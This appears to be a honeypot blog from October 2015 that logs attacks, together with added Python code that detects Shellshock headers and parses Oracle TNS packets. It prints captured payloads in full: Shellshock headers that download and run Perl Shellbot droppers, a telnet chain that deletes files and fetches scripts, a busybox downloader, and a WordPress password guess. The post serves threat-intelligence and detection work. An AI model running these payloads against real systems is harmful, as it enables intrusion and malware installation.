Saturday, 31 October 2015

193.107.88.186 - Backdoor.Perl.Shellbot.jf via tecnoalianza.com

BEGIN OF HTTP DATA:
2015-10-31 01:14:48
Source IP: 193.107.88.186
Country: PL RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'
Host: 195.169.125.87
Connection: Close
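
The request above is the shape every Shellshock probe on this page takes: a Bash function definition "() { :;};" in a header (User-Agent here and in the entries of 24, 23, 13, 6 and 4 October; the Cookie header in the 23 October ping probe), followed by a shell command that fetches and runs a second stage. Matching on User-Agent alone misses the Cookie variant, so the detector below checks every header. This is an added example, not code from the original post: the request samples are constructed from the captures on this page, the regexes are mine, and the tool list only labels which downloaders the payload invokes.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Bash function-definition prefix that the Shellshock (CVE-2014-6271) probes put
# into a header: "() { :;};" followed by the command the vulnerable CGI would run.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;")
URL_RE = re.compile(r"(?:https?|ftp)://[^\s;\"')]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Downloaders seen in the captured payloads; used only to label the finding.
FETCH_TOOLS = ("wget", "curl", "fetch", "lwp-download", "lynx", "GET", "ftpget", "tftp")


@dataclass
class Finding:
    header: str             # header that carried the payload (User-Agent, Cookie, ...)
    command: str            # shell command after the "() { :;};" prefix
    urls: List[str]         # absolute URLs the payload tries to fetch
    ipv4: List[str]         # IPv4 literals in the payload (download hosts, ping targets)
    fetch_tools: List[str]  # which downloaders the payload calls


def parse_request(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP request into its request line and (name, value) headers."""
    lines = raw.strip("\r\n").splitlines()
    request_line = lines[0] if lines else ""
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break                                   # end of the header block
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return request_line, headers


def detect_shellshock(raw: str) -> List[Finding]:
    """Return one Finding per header whose value starts a Bash function definition."""
    _, headers = parse_request(raw)
    findings = []
    for name, value in headers:
        m = SHELLSHOCK_RE.search(value)
        if not m:
            continue
        command = value[m.end():].strip()
        findings.append(Finding(
            header=name,
            command=command,
            urls=sorted(set(URL_RE.findall(command))),
            ipv4=sorted(set(IPV4_RE.findall(command))),
            fetch_tools=[t for t in FETCH_TOOLS if re.search(rf"\b{re.escape(t)}\b", command)],
        ))
    return findings


# Constructed from the captures on this page (31 October User-Agent probe and the
# 23 October Cookie probe); the Host header is the honeypot's own address.
SAMPLE_UA = "\r\n".join([
    "GET HTTP/1.1 HTTP/1.1",
    "Accept: */*",
    r"""User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'""",
    "Host: 195.169.125.87",
    "Connection: Close",
    "", "",
])
SAMPLE_COOKIE = "\r\n".join([
    "GET /rom-0 HTTP/1.1",
    "Host: 109.234.106.8",
    "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    'Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"',
    "Connection: close",
    "", "",
])
SAMPLE_BENIGN = "GET / HTTP/1.1\r\nHost: example.org\r\nUser-Agent: curl/7.47.0\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_UA, SAMPLE_COOKIE, SAMPLE_BENIGN):
        for f in detect_shellshock(sample):
            print(f.header, f.urls, f.ipv4, f.fetch_tools)
```

The URLs and IPv4 literals it pulls out of the command are the indicators worth feeding into a blocklist or a feed search; the honeypot's own address never appears there because it sits in the Host header, not in the payload.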

Domain Name: TECNOALIANZA.COM (66.240.252[.]12)
Registry Domain ID: 137741512_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2014-12-18T11:44:43Z

193.107.88[.]186

    Static Source: GeoIP data
  • Country: Poland
  • ASN: AS48505 Kylos sp. z o.o.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/193.107.88.186

Feed search for 193.107.88[.]186

66.240.252[.]12

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS10439 CariNet, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/66.240.252.12

Feed search for 66.240.252[.]12

Tuesday, 27 October 2015

222.186.21.181 - ORACLE DB access

BEGIN OF ORACLE DATA:
2015-10-27 00:48:15
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@l^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@2^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DATA=(COMMAND=status)(VERSION=169869568))
 END OF DATA

BEGIN OF ORACLE DATA:
2015-10-27 00:48:16
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@<D1>^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@<97>^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=dhaxxor))(COMMAND=status)(ARGUMENTS=64)(PASSWORD=dhaxxor)(SERVICE=LISTENER)(VERSION=135294976)))
 END OF DATA

Mainly I report this because it was the first traffic found on the fake Oracle port, even though user/password dhaxxor does not look like an honest attempt.
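
What the two dumps above contain is readable once the TNS framing is known: an 8-byte header (2-byte packet length, 2-byte checksum, 1-byte type where 1 is CONNECT, 1 reserved byte, 2-byte header checksum), then the CONNECT fields, two of which give the length and offset of the connect string at the end. The first byte pairs confirm it: 0x006c is 108 bytes for the 50-byte "(CONNECT_DATA=...)" string, 0x00d1 is 209 bytes for the 151-byte one. COMMAND=status is the listener-control status query; the first packet sends it with no credentials at all, the second adds USER and PASSWORD. The parser below is an added example, not part of the original post: it rebuilds the two packets from the field values visible in the dump (version 310, SDU 2048, TDU 0x7fff, connect data at offset 58) and parses them back, so the reconstruction is assumed to match the capture byte for byte except for the unused trailing bytes before the connect string.

```python
import struct
from typing import Any, Dict, Optional

TNS_TYPE_CONNECT = 1  # packet type byte of a client CONNECT

# Connect strings exactly as they appear in the two captured packets above.
CONNECT_DATA_1 = b"(CONNECT_DATA=(COMMAND=status)(VERSION=169869568))"
CONNECT_DATA_2 = (b"(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=dhaxxor))"
                  b"(COMMAND=status)(ARGUMENTS=64)(PASSWORD=dhaxxor)(SERVICE=LISTENER)"
                  b"(VERSION=135294976)))")


def build_connect_packet(connect_data: bytes) -> bytes:
    """Rebuild a TNS CONNECT packet with the fixed field values the dump shows."""
    body = struct.pack(
        ">10HIBBII",
        310, 300, 0, 2048, 0x7FFF, 0x7F08, 0, 1,   # version .. "value of 1" byte-order marker
        len(connect_data), 58,                      # connect data length and offset
        0,                                          # max receivable connect data
        0, 0,                                       # connect flags 0 and 1
        0, 0,                                       # trace cross-facility items 1 and 2
    )
    body += b"\x00\x00\x34\xe6\x00\x00\x00\x01"     # trace unique connection id, as captured
    body += bytes(8)                                 # unused bytes up to offset 58
    header = struct.pack(">HHBBH", 8 + len(body) + len(connect_data), 0, TNS_TYPE_CONNECT, 0, 0)
    return header + body + connect_data


def parse_connect_string(s: str) -> Dict[str, Any]:
    """Parse Oracle's nested (KEY=VALUE)(KEY=(...)) syntax into dicts and strings."""
    pos = 0

    def parse_list() -> Dict[str, Any]:
        nonlocal pos
        items: Dict[str, Any] = {}
        while pos < len(s) and s[pos] == "(":
            pos += 1
            eq = s.index("=", pos)
            key = s[pos:eq].strip()
            pos = eq + 1
            if pos < len(s) and s[pos] == "(":
                value: Any = parse_list()           # nested list, e.g. (CID=(PROGRAM=)...)
            else:
                end = s.index(")", pos)
                value = s[pos:end]                  # empty values like (HOST=) are allowed
                pos = end
            if pos >= len(s) or s[pos] != ")":
                raise ValueError(f"expected ')' at offset {pos}")
            pos += 1
            items[key] = value
        return items

    result = parse_list()
    if pos != len(s):
        raise ValueError(f"trailing data at offset {pos}")
    return result


def parse_tns_connect(pkt: bytes) -> Dict[str, Any]:
    """Parse the 8-byte TNS header, the CONNECT fields and the connect string."""
    if len(pkt) < 28:
        raise ValueError("packet too short for a TNS CONNECT")
    length, _chksum, ptype, _flags, _hdr_chksum = struct.unpack(">HHBBH", pkt[:8])
    if ptype != TNS_TYPE_CONNECT:
        raise ValueError(f"not a CONNECT packet (type {ptype})")
    if length != len(pkt):
        raise ValueError(f"length field {length} does not match {len(pkt)} bytes received")
    (version, compat, _svc, sdu, tdu, _nt, _lta, _one,
     cd_len, cd_off) = struct.unpack(">10H", pkt[8:28])
    if cd_off + cd_len > length:
        raise ValueError("connect data runs past the end of the packet")
    connect_data = pkt[cd_off:cd_off + cd_len].decode("ascii", "replace")
    return {"packet_length": length, "version": version, "version_compatible": compat,
            "sdu": sdu, "tdu": tdu, "connect_data": connect_data,
            "fields": parse_connect_string(connect_data)}


def find_key(tree: Dict[str, Any], key: str) -> Optional[str]:
    """Depth-first lookup of a key anywhere in the nested connect string."""
    for k, v in tree.items():
        if k == key and isinstance(v, str):
            return v
        if isinstance(v, dict):
            hit = find_key(v, key)
            if hit is not None:
                return hit
    return None


def describe(parsed: Dict[str, Any]) -> str:
    """One-line triage: listener-control command plus any credentials offered."""
    f = parsed["fields"]
    cmd = find_key(f, "COMMAND")
    if cmd is None:
        target = find_key(f, "SERVICE_NAME") or find_key(f, "SID")
        return f"client connect to service/SID {target!r}"
    user, pw = find_key(f, "USER"), find_key(f, "PASSWORD")
    creds = f" user={user!r} password={pw!r}" if pw is not None else " (no password supplied)"
    return f"listener control command {cmd!r}{creds}"


if __name__ == "__main__":
    for cd in (CONNECT_DATA_1, CONNECT_DATA_2):
        print(describe(parse_tns_connect(build_connect_packet(cd))))
```

A honeypot (or an IDS rule) keyed on "(COMMAND=" inside a CONNECT packet catches listener-control probes regardless of which client generated them, and the parsed USER/PASSWORD pair is what to log when someone tries a listener password.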

222.186.21[.]181

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/222.186.21.181
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/222.186.21.181
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Saturday, 24 October 2015

218.94.94.86 - Shellshock perl via http://www.testvc.it/TESTONLY

BEGIN OF HTTP DATA:
2015-10-24 04:41:02
Source IP: 218.94.94.86
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget -O /dev/null http://www.testvc.it/TESTONLY; curl -O /dev/null http://www.testvc.it/TESTONLY; fetch http://www.testvc.it/TESTONLY; GET http://www.testvc.it/TESTONLY; lwp-download http://www.testvc.it/TESTONLY; lynx http://www.testvc.it/TESTONLY");'
Host: 109.234.106.8
Connection: Close

218.94.94[.]86

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/218.94.94.86
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

testvc.it

Registrant
Organization: MADE TO SELL SRL
Address: VIA VITTORIO EMANUELE 33
         CALENZANO

62.48.49[.]78

    Static Source: GeoIP data
  • Country: Italy
  • ASN: AS13284 Playnet S.R.L.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.48.49.78

185.93.185.47 - Shellshock ping to 212.47.238.143

BEGIN OF HTTP DATA:
2015-10-23 22:18:50
Source IP: 185.93.185.47
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close

212.47.238[.]143

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/212.47.238.143

Feed search for 212.47.238[.]143

185.93.185[.]47

    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS204209 Individual entrepreneur Tereschenko Marina Evgenievna
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.93.185.47
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/185.93.185.47

Feed search for 185.93.185[.]47

221.3.153.172 - Backdoor.Perl.Shellbot via http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh

BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 221.3.153[.]172

    Source: Local Feed Database
  • Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
  • Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
  • In db since: 2015-10-21 13:01:19.504158

Wednesday, 21 October 2015

74.94.108.29 - wp_woocommerce / virtuemart Cookie and Auth

BEGIN OF HTTP DATA:
2015-10-21 10:56:18
Source IP: 74.94.108.29
Country: US RiskScore: 1 Malware: []
GET http://ya.ru:80/ HTTP/1.1
Content-Type: text/html
Host: ya.ru
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic Og==
Cookie: nl-wag-lbsession=493641290.39121.584371104.3216573472; JSESSIONID=3F318DEF20EA379FF67AA05B51374618; 9db8b84e697d8de7acd04dee7393b60a=ae337258da9910c1feaf1f03b9df7725; wfvt_4053413342=56274d2d95c4e; CFTOKEN=98030C9E-58DE-4492-AAA47B1510FA5BF7; CFID=12366; ASPSESSIONIDQCAABTCD=PBIANEADMJBMMEHPKHPEKMAP; ASPSESSIONIDQASRRQRB=LCAABDADJPOGJALLBHMBGNBN; ASPSESSIONIDACACCQTS=BNGFBDADHOLOELKAMDJIFEME; ASPSESSIONIDCQTSABBT=CECMJGADBKMGLMCECPFLFPNN; ASPSESSIONIDAQDACTSD=AKIFDJDDAJNIJNAHIHELNJIB; X-Mapping-jfocjcpm=A58326710875159DFD1FE605A98F3A80; X-Mapping-ihnbadbn=8BEBCF55946DB931DDF1C87D24A0415C; X-Mapping-jdinjeol=FFDF3B29993B876585FCDFA9909EF15F; wp_shopp_bc38cde85b50c10d9bdebb0eb9193993=0ba9c5b80f14e3f69860cda7509a7077; site[currency]=Q2FrZQ%3D%3D.vETn; CmsDomain=ya.ru; incap_ses_199_81566=CowODjN5bwLj6hkOvh7DAvZKJ1YAAAAAB+BCoPnonUJVBYCp5xUKeQ==; incap_ses_407_81566=ZiaWKzMEIgHDhOlfWvSlBfVKJ1YAAAAAfo/1rHWeppqZ6cdvfuJygQ==; incap_ses_406_81566=VOYzJLd34ACTtwr062aiBfNKJ1YAAAAA5nUs9H2KvROsHSxk0yOoEg==;
 incap_ses_401_81566=1LbWZCya8SvkuymvnKOQBfVKJ1YAAAAAy8RJbgwe/Y9PBd7XDw6cGg==; incap_ses_120_81566=2RjJBLglW191UoOJbVOqAdJKJ1YAAAAAf1UQwaBqr5Q2wMpPHAQzaw==; incap_ses_261_81566=GZFGVnd3gXbLg9D+zkKfA9FKJ1YAAAAA2WcQTAGttQIVGqAIjg7fRg==; incap_ses_315_81566=x1z+JLhBoEOPMkXlOBtfBNBKJ1YAAAAAqbuqN5aJ+t3aC1WvABbnpw==; incap_ses_313_81566=/PXnYr1CfhNBs2r3LwBYBNBKJ1YAAAAA3TQ/Y6pEe9RAPouemwDbXg==; incap_ses_305_81566=RGA+XGM6xmecIhByTZQ7BM5KJ1YAAAAA3rjxLOTABAkf53cptw7paw==; incap_ses_288_81566=3Kc0cX2Hr3j8MJEq4i7/A8NKJ1YAAAAAAt+Y5yuHzk8KE/HuJXRI9g==; incap_ses_287_81566=w/wICF7G1GDzkOg8TKH7A79KJ1YAAAAAUL1px1Y01QJyJ/n/pGVI8A==; incap_ses_200_81566=OAVsNLkUm354oNE05YvGAqlKJ1YAAAAAxuJV8VYMtg3gV6RmKu1wew==; visid_incap_81566=8xGGpkYVRvilOCRZozp2W6lKJ1YAAAAAQUIPAAAAAADRL/a6/cPFkRp0rDsRnGWo; imp=S_n8yXBXBcel4PcTxg63NoDy6Loe610223Z0000Z0; ASPSESSIONIDSQTCSTCS=FKOFIBOCFBFEMNCGEPPIJDLF; bd45d1676dea992b2a6b94dd527b20c2=7011dcd6fd478fc235e3040e6a279ae1; virtuemart=36939bcb581af13e6e7823e25bad5880;
 d0c6e38cc40e095b29d8a68f70508dee=-; wp_woocommerce_session_fa8c6534742fba09c695479b86b3f50d=0e49327a58656322f9d7b3401f1d4603%7C%7C1445585631%7C%7C1445582031%7C%7C365c5ab325c06e102f5b29921898a4f2; uEUb_2132_lastact=1445412735%09forum.php%09; uEUb_2132_sid=InzUW5; uEUb_2132_lastvisit=1445409135; uEUb_2132_saltkey=YKpFR7pK; rg_cookie_session_id=549763849; PIWIK_SESSID=10361ae0ab110d2b93baf4907dde252d; corebb7bvisit=1445412063; GBALID=web01; ASPSESSIONIDSQBCDAQD=BHHHPNOABKBFDHFICLIHIFME; BIGipServerwww.agnis.net-HTTP=2493880074.20480.0000; EkAnalytics=0; EktGUID=66e92cf7-6a60-496f-aae8-11a40c0bac96; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=ya.ru&SiteLanguage=1033; CID=7ae028d37d407c5edcf586b3396dfcd75c48bed9s%3A40%3A%22d51ce68a4e9c6f58aa7ae28ce3b41bbd6e8738b1%22%3B; juSecondLang=fa; juFirstLang=en;
 PHPSESSID=c4fa633918d04c44e65d62eb7735adc8; ASPSESSIONIDQQRQRCDC=ILLFLNJDDBNCMELHLKFFGFBJ; Cacti=n1rek3j8pdj08nvj8bi6ot8dj5; ASP.NET_SessionId=3zc024ndj3yvajcyw5rw2vp1; .ASPXANONYMOUS=PB2ACGBC0QEkAAAAMjI2Mzg0OTMtYzk3My00NGE0LTkxYzgtZmE2MWUzY2U5MGUy--uyzTEzsohzI0t45c49Aeo2c2UuUsTfNVKkGB8VVk81; AIROS_SESSIONID=757da0eccfd2ab191585a35dd22cfde9; 1f9adce772dab79ce17b47eeff21ce20=3bc5dcaf79f897eeb113a3d87c756a55
Not to mention that this honeypot does not run any content except "Hello World".

74.94.108[.]29

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS7922 Comcast Cable Communications, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/74.94.108.29


Monday, 19 October 2015

87.106.142.17 - Wordpress xmlrpc.php

BEGIN OF HTTP DATA:
2015-10-19 13:43:02
Source IP: 87.106.142.17
Country: DE RiskScore: 1 Malware: []
POST /xmlrpc.php HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check

<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>

87.106.142[.]17

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS8560 1&1 Internet AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/87.106.142.17

Thursday, 15 October 2015

113.126.198.158 - Telnet code execution after login, download via 158.69.203.229

BEGIN OF TELNET DATA:
2015-10-14 09:48:52
Source IP: 113.126.198.158
Country: CN RiskScore: 2.9 Malware: []
sh
shelrm -rf /tmp/* /var/*;cd /tmp || cd /var/;wget http://158.69.203.229/ff.sh;sh ff.sh;ftpget -u anonymous -p anonymous 158.69.203.229 ff2.sh ff2.sh;sh ff2.sh;tftp -r ff3.sh -g 158.69.203.229;sh ff3.sh
User: root
Pass:

 END OF DATA
The first script is a simple one:
#!/bin/sh
cp /bin/busybox ./
wget http://158.69.203.229/arm;cat arm >busybox;rm -f arm;chmod 777 busybox;./busybox
wget http://158.69.203.229/mips;cat mips >busybox;rm -f mips;./busybox
wget http://158.69.203.229/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox
wget http://158.69.203.229/ppc;cat ppc >busybox;rm -f ppc;./busybox
wget http://158.69.203.229/sh;cat sh >busybox;rm -f sh;./busybox
The FTP server is also publicly available:
ftp> ls
227 Entering Passive Mode (158,69,203,229,209,227)
150 Opening ASCII mode data connection for file list
-rwxr-xr-x   1 root     root        41652 Oct 12 23:33 arm
-rw-r--r--   1 root     root          523 Oct 10 17:04 ff2.sh
-rwxr-xr-x   1 root     root        50743 Oct 15 03:28 find
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mips
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mipsel
-rwxr-xr-x   1 root     root        41128 Oct 12 23:33 ppc
-rwxr-xr-x   1 root     root        38324 Oct 12 23:33 sh
The file sh is:
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
The files are available via my DRIVE share; the password is "infected".

158.69.203[.]229

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/158.69.203.229

Feed search for 158.69.203[.]229

113.126.198[.]158

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: IBM X-Force Exchange
  • Score: 2.9
  • Reference: https://exchange.xforce.ibmcloud.com/ip/113.126.198.158
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.126.198.158

Feed search for 113.126.198[.]158

Tuesday, 13 October 2015

186.56.42.11 - Shellshock attempt via 46.105.96.205

BEGIN OF HTTP DATA:
2015-10-13 07:26:22
Source IP: 186.56.42.11
Country: AR RiskScore: 10 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 46.105.96.205/TEST231;curl 46.105.96.205/TEST231;fetch 46.105.96.205/TEST231;lwp-download 46.105.96.205/TEST231;GET 46.105.96.205/TEST231");'
Host: 195.169.125.87
Connection: Close

46.105.96[.]205

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.105.96.205

186.56.42[.]11

    Static Source: GeoIP data
  • Country: Argentina
  • ASN: AS22927 Telefonica de Argentina
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/186.56.42.11
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/186.56.42.11
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Monday, 12 October 2015

221.3.153.172 - perl Trojan via Shellshock - CC 69.89.2.153

BEGIN OF HTTP DATA:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close

ClamAV reports it as:

license.txt: Trojan.Perl.Shellbot-2 FOUND

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt


The hardcoded C&C address is:

69.89.2[.]153

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS20141 Quality Technology Services, LLC.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/69.89.2.153

Saturday, 10 October 2015

199.115.117.88 - GET /admin/i18n/readme.txt

BEGIN OF HTTPS DATA:
2015-10-09 16:41:51
Source IP: 199.115.117.88
Country: US RiskScore: 8.6 Malware: []
GET /admin/i18n/readme.txt HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.8.0

199.115.117[.]88

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS30633 Leaseweb USA, Inc.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/199.115.117.88
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/199.115.117.88
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

61.186.245.211 - com.opensymphony.xwork2 (Apache Struts 2 OGNL injection probe)

BEGIN OF HTTP DATA:
2015-10-09 20:30:25
Source IP: 61.186.245.211
Country: CN RiskScore: 1 Malware: []
POST /getNews.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
